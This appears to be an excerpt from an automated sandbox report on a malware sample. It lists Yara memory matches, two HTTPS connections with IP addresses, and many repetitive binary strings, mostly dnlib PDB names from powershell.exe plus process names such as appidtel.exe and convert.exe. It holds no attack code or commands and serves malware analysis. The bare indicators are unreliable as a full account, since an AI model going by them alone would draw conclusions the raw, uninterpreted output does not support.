Source: Yara match	File source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49842 version: TLS 1.2

Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 0000000A.00000003.2629248061.0000000003729000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000003.2627277075.000000000357A000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 00000013.00000003.2729543157.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2733109530.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.00000000037FE000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.0000000003660000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: appidtel.pdb source: convert.exe, 00000013.00000002.2977602776.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.000000000259C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F20C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: appidtel.exe, 0000000A.00000003.2629248061.0000000003729000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000003.2627277075.000000000357A000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2729543157.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2733109530.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.00000000037FE000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.0000000003660000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: convert.pdb source: appidtel.exe, 0000000A.00000002.2727615136.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536147480.0000000001288000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000003.2670887482.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: convert.pdbGCTL source: appidtel.exe, 0000000A.00000002.2727615136.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536147480.0000000001288000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000003.2670887482.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mNqSPruzCXM.exe, 00000011.00000000.2643006321.000000000026E000.00000002.00000001.01000000.00000006.sdmp, mNqSPruzCXM.exe, 00000018.00000000.2801120472.000000000026E000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: appidtel.pdbGCTL source: convert.exe, 00000013.00000002.2977602776.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.000000000259C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F20C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
